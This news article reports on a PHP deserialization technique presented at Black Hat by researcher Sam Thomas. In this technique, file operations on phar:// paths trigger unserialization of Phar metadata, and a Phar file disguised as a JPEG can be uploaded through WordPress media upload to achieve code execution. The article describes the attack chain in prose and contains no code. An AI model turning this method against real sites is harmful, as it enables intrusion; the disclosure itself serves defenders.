New Exploit Technique Uncovered, Leaving Websites Vulnerable to PHP Deserialization Attacks
Security researcher Sam Thomas from Secarma has identified a significant exploitation method that raises alarms for PHP-based web applications. This newly discovered technique enhances the potential for hackers to exploit critical deserialization vulnerabilities, particularly in functions that were previously deemed low-risk. Consequently, hundreds of thousands of websites are now susceptible to remote code execution attacks, affecting popular content management systems like WordPress and Typo3.
Deserialization vulnerabilities in PHP were first documented in 2009, allowing attackers to launch various types of assaults by feeding malicious inputs into the unserialize() function. However, Thomas’s recent findings reveal that attackers can leverage low-risk functions in conjunction with PHP Archive (Phar) files to trigger deserialization exploits without directly using unserialize(). This revelation is particularly concerning, as Phar files contain serialized metadata that is interpreted whenever a file operation function—such as fopen or file_exists—attempts to access them.
Thomas explains that these vulnerabilities are exposed through both direct file operations and indirect actions initiated during external entity processing, such as when exploitation of XML External Entity (XXE) vulnerabilities occurs. He presented this in-depth analysis at the Black Hat conference, detailing how this attack vector could be exploited specifically within WordPress sites.
In a practical demonstration, an attacker needs only to upload a malicious Phar file onto a targeted server’s local file system, then utilize a file operation function to access it via the phar:// stream wrapper. This method opens the door to significant security breaches, as even JPEG images can be repurposed to pivot an attack. By altering the first 100 bytes of a Phar archive to disguise it as a JPEG, an attacker can exploit WordPress’s media upload capabilities to achieve unauthorized access.
“The thumbnail functionality within WordPress empowers an attacker with permissions to upload media to manipulate parameters in a file_exists operation, inadvertently enabling unserialization,” said Thomas. When malicious images are uploaded, they can be accessed as Phar archives, allowing for arbitrary code execution during metadata deserialization.
The consequence of this vulnerability extends to any remote authenticated user who can create or edit posts, potentially leading to the execution of unauthorized PHP code within susceptible systems. In response to Thomas’s findings, the WordPress security team acknowledged the reported vulnerability last year; however, patches released have not fully mitigated the identified risks. Typo3 has been more proactive, addressing the vulnerability in its subsequent releases.
As these web applications continue to be used widely across various sectors, the implications of such vulnerabilities are critical for business owners to understand. This incident highlights the ever-evolving landscape of cybersecurity threats and the necessity for organizations to adopt robust security measures, ensuring that all software components are monitored and patched against emerging exploit techniques.
For further details on the vulnerability and its implications, readers are encouraged to access the full research paper published by Secarma, which delves deeper into the mechanics of these attacks and offers insights for enhanced security practices in PHP-based applications. As cyber threats become increasingly sophisticated, maintaining vigilance and implementing proactive security strategies will be imperative in safeguarding digital assets.